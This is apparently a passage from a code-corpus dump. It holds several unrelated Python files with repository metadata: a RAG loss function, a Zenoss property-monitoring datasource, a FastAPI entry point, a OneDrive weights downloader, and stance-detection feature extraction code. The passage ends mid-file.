        n_docs = n_docs if n_docs is not None else self.config.n_docs
        # bos_token_id is None for T5
        bos_token_id = self.config.bos_token_id or self.config.generator.bos_token_id
        use_bos = bos_token_id is not None and target[:, 0].eq(bos_token_id).all()
        def _mask_pads(ll, smooth_obj):
            # Zero out contributions of padding positions.
            pad_mask = target.eq(self.config.generator.pad_token_id)
            if pad_mask.any():
                ll.masked_fill_(pad_mask, 0.0)
                smooth_obj.masked_fill_(pad_mask, 0.0)
            return ll.squeeze(-1), smooth_obj.squeeze(-1)
        # seq_logits dim = (batch*n_docs, tgt_len , #vocabs)
        seq_logprobs = torch.nn.functional.log_softmax(seq_logits, dim=-1).view(
            seq_logits.shape[0] // n_docs, n_docs, -1, seq_logits.size(-1)
        )  # batch_size x n_docs x tgt_len x #vocab_size
        # (bs, n_docs) or (bs, bs * n_docs) or (bs, bs * n_docs + memory_bank_size)
        doc_logprobs = torch.nn.functional.log_softmax(doc_scores, dim=1)
        bs = doc_logprobs.size(0)
        if doc_logprobs.size(1) == n_docs:
            pass
        elif doc_logprobs.size(1) >= bs * n_docs:  # contain doc log probs over the whole batch (plus memory bank)
            # (bs, bs, n_docs)
            doc_logprobs = doc_logprobs[:, :bs * n_docs].view(bs, bs, n_docs)  # remove memory bank
            # (bs, n_docs) — each example keeps only its own (diagonal) docs.
            doc_logprobs = torch.masked_select(
                doc_logprobs,
                torch.eye(bs).unsqueeze(-1).bool().to(doc_logprobs.device)).view(bs, n_docs)
        else:
            raise Exception(f'the size of document log prob {doc_logprobs.size()} is unexpected')
        doc_logprobs = doc_logprobs.unsqueeze(-1).unsqueeze(-1)
        # RAG-sequence marginalization
        first_token_scores = seq_logprobs[:, :, :1, :]
        second_token_scores = seq_logprobs[:, :, 1:2, :]
        remainder = seq_logprobs[:, :, 2:, :]
        rag_logprobs = torch.cat([first_token_scores, second_token_scores + doc_logprobs, remainder], dim=2)
        # calculate loss
        target = target.unsqueeze(1).unsqueeze(-1).repeat(1, n_docs, 1, 1)
        assert target.dim() == rag_logprobs.dim()
        ll = rag_logprobs.gather(dim=-1, index=target)
        smooth_obj = rag_logprobs.sum(dim=-1, keepdim=True)  # total sum of all (normalised) logits
        ll, smooth_obj = _mask_pads(ll, smooth_obj)
        # sum over tokens, exclude bos while scoring
        ll = ll[:, :, 1:].sum(2) if exclude_bos_score and use_bos else ll.sum(2)
        smooth_obj = smooth_obj.sum(2)
        ll = ll.logsumexp(1)  # logsumexp over docs
        smooth_obj = smooth_obj.logsumexp(1)
        nll_loss = -ll
        smooth_loss = -smooth_obj
        if reduce_loss:
            nll_loss = nll_loss.sum()
            smooth_loss = smooth_loss.sum()
        eps_i = epsilon / rag_logprobs.size(-1)
        loss = (1.0 - epsilon) * nll_loss + eps_i * smooth_loss
        return loss
| jzbjyb/multihop | rag/rag_model.py | rag_model.py | py | 19,076 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "transformers.AutoConfig.from_pretrained",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": ... |
22542445043 | from zope.component import adapts
from zope.interface import implements
from Products.ZenModel.RRDDataSource import SimpleRRDDataSource
from Products.ZenModel.ZenPackPersistence import ZenPackPersistence
from Products.ZenUtils.ZenTales import talesEvalStr
from Products.Zuul.form import schema
from Products.Zuul.infos import ProxyProperty
from Products.Zuul.infos.template import RRDDataSourceInfo
from Products.Zuul.interfaces import IRRDDataSourceInfo
from Products.Zuul.utils import ZuulMessageFactory as _t
from Products.ZenWidgets import messaging
from Products.Zuul.interfaces import ICatalogTool, IInfo
from Products.AdvancedQuery import Eq
class MonitoredPropertyDataSource(ZenPackPersistence, SimpleRRDDataSource):
    '''
    Model class for MonitoredPropertyDataSource.

    A Zenoss RRD datasource that records the value of a modeled component
    property (identified by class_name / property_name) instead of running
    a command or query against the device.
    '''
    ZENPACKID = 'ZenPacks.zenoss.PropertyMonitor'
    # Datasource type name shown in the UI's source-type selector.
    MBP_TYPE = 'Property'
    sourcetypes = (MBP_TYPE,)
    sourcetype = MBP_TYPE
    # SimpleRRDDataSource property overrides.
    # cycletime is a TALES expression so the interval can be tuned per
    # device or device class via the zPropertyMonitorInterval zProperty.
    cycletime = '${here/zPropertyMonitorInterval}'
    eventClass = '/Ignore'
    severity = 0
    # Meta type of the component class to query, and the name of the Info
    # property to record; both are configured through the UI.
    class_name = ''
    property_name = ''
    # Re-declare cycletime as a writable *string* property so the TALES
    # expression above is accepted; keep the rest of the base properties.
    _properties = tuple([p for p in SimpleRRDDataSource._properties if p['id'] != 'cycletime']) + (
        {'id': 'cycletime', 'type': 'string', 'mode': 'w'},
        {'id': 'class_name', 'type': 'string', 'mode': 'w'},
        {'id': 'property_name', 'type': 'string', 'mode': 'w'},
    )
    def getDescription(self):
        '''
        Return a friendly description of this datasource.
        '''
        if not self.property_name:
            return 'Not Configured'
        return "%s / %s" % (self.class_name, self.property_name)
    def getComponent(self, context):
        # The component id for collected values is the context object's id.
        return context.id
    def talesEval(self, text, context):
        '''
        Evaluate the TALES expression *text* against *context*, exposing
        the usual device/datasource convenience names.
        '''
        device = context.device()
        extra = {
            'device': device,
            'dev': device,
            'devname': device.id,
            'datasource': self,
            'ds': self,
        }
        return talesEvalStr(str(text), context, extra=extra)
    def getCycleTime(self, context):
        '''
        Resolve the cycletime TALES expression to an integer interval.
        '''
        return int(self.talesEval(self.cycletime, context))
    def testDataSourceAgainstDevice(self, testDevice, REQUEST, write, errorLog):
        """
        Does the majority of the logic for testing a datasource against the device
        @param string testDevice The id of the device we are testing
        @param Dict REQUEST the browser's request
        @param Function write The output method we are using to stream the result of the command
        @param Function errorLog The output method we are using to report errors
        """
        out = REQUEST.RESPONSE
        # Determine which device to execute against
        device = None
        if testDevice:
            # Try to get specified device
            device = self.findDevice(testDevice)
            if not device:
                errorLog(
                    'No device found',
                    'Cannot find device matching %s.' % testDevice,
                    priority=messaging.WARNING
                )
                return self.callZenScreen(REQUEST)
        elif hasattr(self, 'device'):
            # ds defined on a device, use that device
            device = self.device()
        elif hasattr(self, 'getSubDevicesGen'):
            # ds defined on a device class, use any device from the class.
            # NOTE: .next() is the Python 2 iterator protocol; this targets
            # the Python 2 based Zenoss platform.
            try:
                device = self.getSubDevicesGen().next()
            except StopIteration:
                # No devices in this class, bail out
                pass
        if not device:
            errorLog(
                'No Testable Device',
                'Cannot determine a device against which to test.',
                priority=messaging.WARNING
            )
            return self.callZenScreen(REQUEST)
        ## Execute the datasource
        class_name = REQUEST.get('class_name')
        property_name = REQUEST.get('property_name')
        # Find all components of the requested meta type on the device.
        results = ICatalogTool(device).search(query=Eq('meta_type', class_name))
        if not results.total:
            out.write("0 objects found. No test performed.\n")
            return
        if results.total > 10:
            out.write("%d %s components found, showing first 10<p>\n" % (results.total, class_name))
        for (i, result) in enumerate(results):
            obj = result.getObject()
            # Read the property through the Zuul Info adapter, mirroring
            # what the collection daemon would see.
            info = IInfo(obj)
            property_value = getattr(info, property_name, "ERROR")
            out.write(" '%s' %s = %s<br>\n" % (obj.titleOrId(), property_name, property_value))
            if i + 1 == 10:
                break
class IMonitoredPropertyDataSourceInfo(IRRDDataSourceInfo):
    '''
    API Info interface for MonitoredPropertyDataSource.

    The schema fields declared here drive the datasource edit form in
    the Zenoss UI.
    '''
    # IRRDDataSourceInfo doesn't define this.
    cycletime = schema.TextLine(title=_t(u'Cycle Time (seconds)'))
    # The xtype for class_name also manages property_name.
    class_name = schema.TextLine(
        title=_t(u'Property'),
        group=_t('Detail'),
        xtype='mbp_property')
class MonitoredPropertyDataSourceInfo(RRDDataSourceInfo):
    '''
    API Info adapter factory for MonitoredPropertyDataSource.
    '''
    implements(IMonitoredPropertyDataSourceInfo)
    adapts(MonitoredPropertyDataSource)
    # RRDDataSourceInfo doesn't define this.
    cycletime = ProxyProperty('cycletime')
    # Proxy the configuration fields straight through to the datasource.
    class_name = ProxyProperty('class_name')
    property_name = ProxyProperty('property_name')
    @property
    def testable(self):
        """
        This tells the client if we can test this datasource against a
        specific device.
        """
        return True
| zenoss/ZenPacks.zenoss.PropertyMonitor | ZenPacks/zenoss/PropertyMonitor/datasources/MonitoredPropertyDataSource.py | MonitoredPropertyDataSource.py | py | 5,634 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "Products.ZenModel.ZenPackPersistence.ZenPackPersistence",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "Products.ZenModel.RRDDataSource.SimpleRRDDataSource",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "Products.ZenModel.RRDDataSource.Simpl... |
24844546870 | from fastapi import Depends, FastAPI
from fastapi.middleware.cors import CORSMiddleware
from auth.verify_token import get_query_token
import routers.s3_objects_router as s3_objects_router
import routers.users_router as users_router
import routers.user_objects_router as user_objects_router
import uvicorn
# Port the development server listens on.
PORT = 8000
# Every endpoint requires a valid token (see auth.verify_token.get_query_token).
app = FastAPI(dependencies=[Depends(get_query_token)])
# origins = [
# "http://localhost",
# "http://localhost:3000",
# ]
# NOTE(review): allow_origins=["*"] together with allow_credentials=True is
# rejected by browsers for credentialed requests -- confirm this is intended.
origins = ["*"]
app.add_middleware(
    CORSMiddleware,
    allow_origins=origins,
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
# Mount the feature routers.
app.include_router(s3_objects_router.router)
app.include_router(users_router.router)
app.include_router(user_objects_router.router)
@app.get('/')
async def root():
    # Simple welcome / health-check endpoint.
    return {'message': 'Welcome to Hyper Wasabi!'}
if __name__ == '__main__':
    # Development entry point: run with auto-reload.
    uvicorn.run('main:app', port=PORT, reload=True)
{
"api_name": "fastapi.FastAPI",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "fastapi.Depends",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "auth.verify_token.get_query_token",
"line_number": 14,
"usage_type": "argument"
},
{
"api_name": ... |
30899462486 | import base64
import wget
import settings
weights_path = settings.WEIGHTS_PATH
def from_onedrive(weights_path):
    """Download the shared OneDrive weights file to *weights_path*.

    The share URL is converted into a OneDrive API sharing token:
    base64-encoded, then made URL-safe ('/' -> '_', '+' -> '-') with the
    trailing '=' padding stripped.
    """
    raw_token = base64.b64encode(settings.ONEDRIVE_LINK.encode("utf-8")).decode("utf-8")
    share_token = raw_token.replace("/", "_").replace("+", "-").rstrip("=")
    download_url = (
        "https://api.onedrive.com/v1.0/shares/u!" + share_token + "/root/content"
    )
    wget.download(download_url, weights_path)
| gaston-oviedo/supermarket_object_detection | model/from_drive.py | from_drive.py | py | 465 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "settings.WEIGHTS_PATH",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "base64.b64encode",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "settings.ONEDRIVE_LINK",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name":... |
24337799381 | import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import numpy as np
import pandas as pd
import spacy
import networkx as nx
from scipy.spatial import distance
import matplotlib.pyplot as plt
import nltk
from collections import Counter, defaultdict
import itertools
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sentic import SenticPhrase
# import en_coref_md
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
nlp = spacy.load('en_core_web_sm')
# coref = en_coref_md.load()
# Words that outright negate a claim.
negating_words = set([
    "n't", "not", "no",
    "never", "nobody", "non", "nope"])
# Words signalling the writer disputes or debunks a claim.
doubting_words = set([
    'fake','fraud', 'hoax',
    'false', 'deny', 'denies',
    'despite', 'doubt',
    'bogus', 'debunk', 'prank',
    'retract', 'scam', "withdrawn",
    "misinformation"])
# Words that soften or qualify a claim without rejecting it.
hedging_words = set([
    'allege', 'allegedly','apparently',
    'appear','claim','could',
    'evidently','largely','likely',
    'mainly','may', 'maybe', 'might',
    'mostly','perhaps','presumably',
    'probably','purport', 'purportedly',
    'reported', 'reportedly',
    'rumor', 'rumour', 'rumored', 'rumoured',
    'says','seem','somewhat',
    'unconfirmed'])
# Any word casting suspicion on a claim (doubting or hedging).
sus_words = doubting_words.union(hedging_words)
# Shared VADER analyzer instance used by the sentiment helpers below.
vader = SentimentIntensityAnalyzer()
def get_sentiment(sentence):
    """Return the VADER scores of *sentence* as [pos, neg, neu, compound]."""
    scores = vader.polarity_scores(sentence)
    return [scores[key] for key in ("pos", "neg", "neu", "compound")]
def get_avg_sentiment(lst):
    """Average the VADER score vectors of every sentence in *lst*."""
    score_matrix = np.array([get_sentiment(text) for text in lst])
    return list(score_matrix.mean(axis=0))
def get_diff_sentiment(a, b):
    """Element-wise difference a - b of two score vectors, as a list."""
    return list(np.subtract(a, b))
def preprocess(text):
    """Normalize quotes and punctuation before dependency parsing.

    Strips straight and curly quotes, turns ':' and ';' into sentence
    breaks, and removes ellipses. Replacement order matters: '...' is
    removed only after ':' / ';' expansion.
    """
    replacements = (
        ("' ", ' '),
        ("'\n", '\n'),
        (" '", ' '),
        ('"', ' '),
        ('“', ' '),
        ('”', ' '),
        (':', '. '),
        (';', '. '),
        ('...', ' '),
    )
    for old, new in replacements:
        text = text.replace(old, new)
    return text
def make_graph(token):
    """Recursively convert a dependency-parse token into a nested dict.

    Whitespace children (dep "SPACE") are skipped; "name" is the lowercased
    lemma suffixed with the token's document index to keep it unique.
    """
    kids = [
        make_graph(child)
        for child in list(token.lefts) + list(token.rights)
        if child.dep_ != "SPACE"
    ]
    lemma = token.lemma_.lower()
    return {
        "name": lemma + str(token.i),
        "token": lemma,
        "pos": token.pos_,
        "dep": token.dep_,
        "idx": token.i,
        "children": kids,
    }
def get_display_graph(headline, body_sents):
    """Build display trees rooted at the ROOT token of the headline and of
    each body sentence; raises IndexError if a sentence has no ROOT."""
    def _root_of(sent):
        return [tok for tok in sent if tok.dep_ == "ROOT"][0]
    return {
        "headline": make_graph(_root_of(headline)),
        "body": [make_graph(_root_of(sent)) for sent in body_sents],
    }
def cosine_similarity(x, y):
    """Cosine similarity of two vectors; returns 0 if either is all-zero."""
    def _is_zero(vec):
        return not any(v != 0 for v in vec)
    if _is_zero(x) or _is_zero(y):
        return 0
    return 1 - np.nan_to_num(distance.cosine(x, y))
def get_topics(doc):
    """
    Collect the topical nouns of *doc*.

    Returns a dict keyed by noun lemma whose value is the set of
    noun-chunk strings containing that noun; the special key ``_vocab``
    holds every individual word appearing in any collected chunk.
    Chunk roots of <= 2 characters or with NUM/SYM/PUNCT tags are skipped.
    """
    topics = {}
    for chunk in doc.noun_chunks:
        root = chunk.root
        if len(root.text) <= 2 or root.pos_ in ("NUM", "SYM", "PUNCT"):
            continue
        lemma = root.lemma_.lower()
        topics.setdefault(lemma, {lemma}).add(chunk.text.lower())
    vocab = set()
    for phrases in topics.values():
        for phrase in phrases:
            vocab.update(phrase.split(" "))
    topics["_vocab"] = vocab
    return topics
def get_svos(sent):
    """
    Split a parsed sentence into subject / verb / object dictionaries.

    Each dict maps the lowercased lemma to its token so callers can keep
    traversing the parse tree. Dependency labels per:
    https://github.com/clir/clearnlp-guidelines/blob/master/md/specifications/dependency_labels.md
    """
    subject_deps = {"nsubj", "nsubjpass", "csubj", "csubjpass", "agent", "compound"}
    object_deps = {"dobj", "dative", "attr", "oprd", "pobj"}
    subjects, verbs, objects = {}, {}, {}
    for token in sent:
        dep = token.dep_
        if dep == 'ROOT':
            verbs[token.lemma_.lower()] = token
        elif dep in subject_deps:
            subjects[token.lemma_.lower()] = token
        elif dep in object_deps:
            objects[token.lemma_.lower()] = token
    return (subjects, verbs, objects)
def build_graph(doc):
    """
    Build a directed NetworkX graph of the dependency tree.

    Nodes are lowercased lemmas; an edge runs from each head to each of
    its children, skipping whitespace tokens on either end.
    """
    edge_set = set()
    for head in doc:
        if head.pos_ in ['SPACE']:
            continue
        edge_set.update(
            (head.lemma_.lower(), child.lemma_.lower())
            for child in head.children
            if child.pos_ not in ['SPACE']
        )
    return nx.DiGraph(list(edge_set))
def get_edges(doc):
    """Return (head, child) dependency edges as pairs of attribute dicts,
    skipping whitespace, punctuation, and symbol tokens."""
    skip_pos = ('SPACE', 'PUNCT', 'SYM')
    def _info(tok):
        return {"token": tok.lemma_.lower(), "dep": tok.dep_, "pos": tok.pos_}
    pairs = []
    for head in doc:
        if head.pos_ in skip_pos:
            continue
        for child in head.children:
            if child.pos_ not in skip_pos:
                pairs.append((_info(head), _info(child)))
    return pairs
def get_summary(doc, subjects, n = 5):
    """
    get summary of n sentences in document
    first meaningful sentence will always be returned

    Sentences are scored by the per-token density of subject words
    (weight 1) and negating/doubting/hedging words (weight 1.5);
    sentences of four or fewer tokens score 0.
    """
    subjects_ = subjects
    def score_sentence(sent):
        # not very robust right now
        score = 0
        word_count = 0
        for token in sent:
            word_count += 1
            t = token.lemma_.lower()
            if t in subjects_:
                score += 1
            elif t in negating_words or t in doubting_words or t in hedging_words:
                score += 1.5
        return score/word_count if word_count > 4 else 0
    sentences = [s for s in doc.sents]
    scored_sentences = [[idx, sent, score_sentence(sent)] for idx, sent in enumerate(sentences)]
    # Keep only scoring sentences; sentence 0 is excluded here and handled
    # by the fallback below.
    scored_sentences = [s for s in scored_sentences if s[2] > 0 and s[0] > 0] #filter out non-scoring sentences
    scored_sentences.sort(key = lambda x: x[2], reverse = True)
    # Take the n best scores, then restore document order for readability.
    top = scored_sentences[:n]
    top.sort(key = lambda x: x[0])
    scored_sentences.sort(key = lambda x: x[0])
    result = None
    if len(scored_sentences) == 0:
        # Nothing scored: fall back to the document's first sentence.
        result = [sentences[0]]
    else:
        # NOTE(review): the earliest scoring sentence is prepended and may
        # also appear in `top`, so it can occur twice in the result --
        # confirm whether this duplication is intended.
        result = [scored_sentences[0][1]] + [s[1] for s in top]
    return result
def _min_path_length(graph, source, words):
    """Length of the shortest path from *source* to any word in *words*,
    or None when no such path exists in *graph*."""
    best = None
    for word in words:
        if word in graph:
            try:
                path = nx.shortest_path(graph, source=source, target=word)
            except Exception:
                # No path between source and this word (or node missing).
                continue
            if best is None or len(path) < best:
                best = len(path)
    return best
def get_shortest_path_to_negating(graph, subjects):
    """
    For each subject, find the shortest dependency-graph path to any
    negating, hedging, or doubting word.

    Returns a dict mapping each subject to a 3-element list of path
    lengths [negating, hedging, doubting]. An entry stays None when the
    subject is absent from the graph or has no path to any word of that
    category. (Previous docstring wrongly described a 2-element result.)
    """
    results = {}
    for s in subjects:
        results[s] = [None, None, None]
        if graph.has_node(s):
            # Same computation for all three lexicons; order matches the
            # result-list layout above.
            results[s][0] = _min_path_length(graph, s, negating_words)
            results[s][1] = _min_path_length(graph, s, hedging_words)
            results[s][2] = _min_path_length(graph, s, doubting_words)
    return results
def root_distance(graph, root):
    """
    Shortest distance in *graph* from *root* to any doubting/hedging word
    (as implemented in the Emergent paper); None when *root* is None or
    no such path exists.
    """
    if root == None:
        return None
    best = None
    for word in sus_words:
        if word not in graph:
            continue
        try:
            hops = len(nx.shortest_path(graph, source = root, target = word))
        except:
            continue
        if best == None or hops < best:
            best = hops
    return best
def _context_words(token):
    """Lowercased lemmas (longer than 2 chars) of *token*'s ancestors plus
    its head's other children -- the parse-tree context of the token."""
    words = set(
        ancestor.lemma_.lower() for ancestor in token.ancestors if len(ancestor) > 2
    )
    words.update(
        child.lemma_.lower()
        for child in token.head.children
        if child.text != token.text and len(child) > 2
    )
    return words
def get_neg_ancestors(doc):
    """
    Collect the parse-tree context of negating/doubting/hedging words.

    input: spacy Doc
    returns: 6-tuple of (negating context set, doubting context set,
    hedging context set, # negating words, # doubting words,
    # hedging words).
    """
    neg_ctx, doubt_ctx, hedge_ctx = set(), set(), set()
    neg_n = doubt_n = hedge_n = 0
    for token in doc:
        lemma = token.lemma_.lower()
        if lemma in negating_words:
            neg_ctx |= _context_words(token)
            neg_n += 1
        elif lemma in doubting_words:
            doubt_ctx |= _context_words(token)
            doubt_n += 1
        elif lemma in hedging_words:
            # BUG FIX: the previous code did `results[2] = results[1].union(...)`,
            # which merged the *doubting* context into the hedging slot and
            # discarded any previously accumulated hedging context.
            hedge_ctx |= _context_words(token)
            hedge_n += 1
    return (neg_ctx, doubt_ctx, hedge_ctx, neg_n, doubt_n, hedge_n)
sp = SenticPhrase("Hello, World!")
def get_sentics(sent):
    """
    Return [polarity, aptitude, attention, sensitivity, pleasantness] for
    a sentence via SenticNet.

    SenticPhrase sometimes returns no sentics values at all (apparently
    only for purely neutral text), so missing dimensions default to 0.
    """
    analysis = sp.info(sent)
    values = dict.fromkeys(("pleasantness", "attention", "sensitivity", "aptitude"), 0)
    values.update(analysis["sentics"])
    return [
        analysis['polarity'],
        values['aptitude'],
        values['attention'],
        values['sensitivity'],
        values['pleasantness'],
    ]
def process_sentence(sentence):
    """
    Extract lexical features from one parsed sentence.

    Returns the raw text, kept lemmas (stop words and
    PUNCT/NUM/SYM/SPACE/PART tokens removed), their bigrams, per-POS lemma
    lists, and the subject/verb/object lemma lists from get_svos.
    """
    svo = get_svos(sentence)
    by_pos = {"NOUN": [], "VERB": [], "ADJ": [], "ADV": []}
    tokens = []
    excluded = ('PUNCT', 'NUM', 'SYM', 'SPACE', 'PART')
    for token in sentence:
        if token.is_stop or token.pos_ in excluded:
            continue
        lemma = token.lemma_.lower()
        if token.pos_ in by_pos:
            by_pos[token.pos_].append(lemma)
        tokens.append(lemma)
    bigram_str = [first + ' ' + second for first, second in nltk.bigrams(tokens)]
    return {
        "raw": sentence.text,
        "tokens": tokens,
        "bigrams": bigram_str,
        "nouns": by_pos["NOUN"],
        "verbs": by_pos["VERB"],
        "adjectives": by_pos["ADJ"],
        "adverbs": by_pos["ADV"],
        "svo": [list(item) for item in svo]
    }
def score_sentence_idf(sent, idf):
    """Mean idf weight of a sentence's lemmas (unknown lemmas count 0);
    sentences of four or fewer tokens score 0."""
    lemmas = [token.lemma_.lower() for token in sent]
    if len(lemmas) <= 4:
        return 0
    total = sum(idf[lemma] for lemma in lemmas if lemma in idf)
    return total / len(lemmas)
def process_body(body, idf):
    """
    Extract document-level lexical features from a parsed article body.

    *idf* maps lemmas to inverse-document-frequency weights and must
    contain the key "_avg" as the fallback weight for unseen lemmas.
    Returns kept lemmas, bigrams, per-POS lists, processed first and
    most-idf-significant sentences, and the top tf-idf terms.
    """
    sentences = [s for s in body.sents]
    if len(sentences) == 0:
        sentences = [body]
    # first sentence of article
    first_sentence_data = process_sentence(sentences[0])
    nouns = []
    verbs = []
    adjectives = []
    adverbs = []
    tokens = []
    # Classify every kept (non-stop, non-punctuation-like) lemma by POS.
    for token in body:
        if not token.is_stop and token.pos_ not in ['PUNCT', 'NUM', 'SYM','SPACE','PART']:
            if token.pos_ == "NOUN":
                nouns.append(token.lemma_.lower())
            elif token.pos_ == "VERB":
                verbs.append(token.lemma_.lower())
            elif token.pos_ == "ADJ":
                adjectives.append(token.lemma_.lower())
            elif token.pos_ == "ADV":
                adverbs.append(token.lemma_.lower())
            tokens.append(token.lemma_.lower())
    bigram = list(nltk.bigrams(tokens))
    bigram_str = [x[0]+' '+x[1] for x in bigram]
    doc_len = len(tokens)
    n_counter = Counter(nouns)
    v_counter = Counter(verbs)
    b_counter = Counter(bigram)
    t_counter = Counter(tokens)
    avg_idf = idf["_avg"]
    # tf-idf per term: term frequency times idf (average idf for unknowns).
    n_tfidf, v_tfidf, t_tfidf = {}, {}, {}
    for n in n_counter:
        n_tfidf[n] = (n_counter[n]/doc_len) * (idf[n] if n in idf else avg_idf)
    for v in v_counter:
        v_tfidf[v] = (v_counter[v]/doc_len) * (idf[v] if v in idf else avg_idf)
    for t in t_counter:
        t_tfidf[t] = (t_counter[t]/doc_len) * (idf[t] if t in idf else avg_idf)
    common_nouns = sorted(n_tfidf, key=n_tfidf.get, reverse=True)[:5]
    common_verbs = sorted(v_tfidf, key=v_tfidf.get, reverse=True)[:5]
    common_tokens = sorted(t_tfidf, key=t_tfidf.get, reverse=True)[:5]
    # no idf for bigrams increase "common" count to 10
    common_bigrams = [x[0] for x in b_counter.most_common(10)]
    scored_sentences = [[idx, sent, score_sentence_idf(sent, idf)] for idx, sent in enumerate(sentences)]
    # NOTE(review): this line is a plain copy -- the non-scoring filter the
    # comment describes was apparently never applied; confirm intent.
    scored_sentences = [s for s in scored_sentences] #filter out non-scoring sentences
    scored_sentences.sort(key = lambda x: x[2], reverse = True)
    most_significant_sentence_data = process_sentence(scored_sentences[0][1])
    return {
        "tokens": tokens,
        "bigrams": bigram_str,
        "nouns": nouns,
        "verbs": verbs,
        "first_sentence": first_sentence_data,
        "significant_sentence": most_significant_sentence_data,
        "vocabulary": list(set(tokens)),
        "common_tokens": common_tokens,
        "common_nouns": common_nouns,
        "common_verbs": common_verbs,
        "common_bigrams": common_bigrams,
    }
def bow_cos_similarity(a, b):
    """Cosine similarity of the binary bag-of-words vectors of *a* and *b*;
    returns -1 when either input is empty."""
    if not a or not b:
        return -1
    a_set = set(a)
    b_set = set(b)
    vocab = a_set | b_set
    a_vec = [int(word in a_set) for word in vocab]
    b_vec = [int(word in b_set) for word in vocab]
    return 1 - distance.cosine(a_vec, b_vec)
def get_features_rel(headline_data, body_data):
    """Relatedness feature dicts for the headline against every body item."""
    return [get_feats_rel(headline_data, body_item) for body_item in body_data]
def get_feats_rel(headline_data, body_data):
    """
    Compute headline/body relatedness features.

    *headline_data* is a dict from process_sentence and *body_data* a dict
    from process_body. Features are overlap counts and bag-of-words cosine
    similarities between the headline and (a) the body's most common
    terms, (b) its first sentence (_fst), and (c) its most significant
    sentence (_sig), plus subject/verb/object overlaps. Returns a flat
    feature dict.
    """
    # Overlap with the body's highest-tf-idf terms.
    shared_common_nouns = len(set(headline_data['nouns']).intersection(
        set(body_data['common_nouns'])))
    shared_common_verbs = len(set(headline_data['verbs']).intersection(
        set(body_data['common_verbs'])))
    shared_common_tokens = len(set(headline_data['tokens']).intersection(
        set(body_data['common_tokens'])))
    shared_bigrams = len(set(headline_data['bigrams']).intersection(
        set(body_data['common_bigrams'])))
    # Overlap with the body's first sentence.
    shared_nouns_first = len(set(headline_data['nouns']).intersection(
        set(body_data['first_sentence']['nouns'])))
    shared_verbs_first = len(set(headline_data['verbs']).intersection(
        set(body_data['first_sentence']['verbs'])))
    shared_bigrams_first = len(set(headline_data['bigrams']).intersection(
        set(body_data['first_sentence']['bigrams'])))
    shared_tokens_first = len(set(headline_data['tokens']).intersection(
        set(body_data['first_sentence']['tokens'])))
    # Overlap with the body's most significant sentence.
    shared_nouns_sig = len(set(headline_data['nouns']).intersection(
        set(body_data['significant_sentence']['nouns'])))
    shared_verbs_sig = len(set(headline_data['verbs']).intersection(
        set(body_data['significant_sentence']['verbs'])))
    shared_bigrams_sig = len(set(headline_data['bigrams']).intersection(
        set(body_data['significant_sentence']['bigrams'])))
    shared_tokens_sig = len(set(headline_data['tokens']).intersection(
        set(body_data['significant_sentence']['tokens'])))
    # svo entries are [subjects, verbs, objects] lemma lists.
    headline_svo = headline_data['svo']
    body_fst_svo = body_data['first_sentence']['svo']
    body_sig_svo = body_data['significant_sentence']['svo']
    # cosine similarity - no verbs because relatively few per sentence
    cos_nouns_first = bow_cos_similarity(
        headline_data['nouns'], body_data['first_sentence']['nouns'])
    cos_bigrams_first = bow_cos_similarity(
        headline_data['bigrams'], body_data['first_sentence']['bigrams'])
    cos_tokens_first = bow_cos_similarity(
        headline_data['tokens'], body_data['first_sentence']['tokens'])
    cos_nouns_sig = bow_cos_similarity(
        headline_data['nouns'], body_data['significant_sentence']['nouns'])
    cos_bigrams_sig = bow_cos_similarity(
        headline_data['bigrams'], body_data['significant_sentence']['bigrams'])
    cos_tokens_sig = bow_cos_similarity(
        headline_data['tokens'], body_data['significant_sentence']['tokens'])
    # SVO similarity over the concatenated subject+verb+object lemmas.
    svo_cos_sim_fst = bow_cos_similarity(
        body_fst_svo[0]+body_fst_svo[1]+body_fst_svo[2],
        headline_svo[0]+headline_svo[1]+headline_svo[2])
    svo_cos_sim_sig = bow_cos_similarity(
        body_sig_svo[0]+body_sig_svo[1]+body_sig_svo[2],
        headline_svo[0]+headline_svo[1]+headline_svo[2])
    svo_s_fst = len(set(body_fst_svo[0]).intersection(set(headline_svo[0])))
    svo_v_fst = len(set(body_fst_svo[1]).intersection(set(headline_svo[1])))
    svo_o_fst = len(set(body_fst_svo[2]).intersection(set(headline_svo[2])))
    svo_s_sig = len(set(body_sig_svo[0]).intersection(set(headline_svo[0])))
    svo_v_sig = len(set(body_sig_svo[1]).intersection(set(headline_svo[1])))
    svo_o_sig = len(set(body_sig_svo[2]).intersection(set(headline_svo[2])))
    return {
        'shared_nouns': shared_common_nouns,
        'shared_verbs': shared_common_verbs,
        'shared_bigrams': shared_bigrams,
        'shared_tokens': shared_common_tokens,
        'shared_nouns_fst': shared_nouns_first,
        'shared_verbs_fst': shared_verbs_first,
        'shared_bigrams_fst': shared_bigrams_first,
        'shared_tokens_fst': shared_tokens_first,
        'shared_nouns_sig': shared_nouns_sig,
        'shared_verbs_sig': shared_verbs_sig,
        'shared_bigrams_sig': shared_bigrams_sig,
        'shared_tokens_sig': shared_tokens_sig,
        'cos_nouns_sig': cos_nouns_sig,
        'cos_bigrams_sig': cos_bigrams_sig,
        'cos_tokens_sig': cos_tokens_sig,
        'cos_nouns_fst': cos_nouns_first,
        'cos_bigrams_fst': cos_bigrams_first,
        'cos_tokens_fst': cos_tokens_first,
        'svo_cos_sim_fst' : svo_cos_sim_fst,
        'svo_cos_sim_sig' : svo_cos_sim_sig,
        'svo_s_fst': svo_s_fst,
        'svo_v_fst': svo_v_fst,
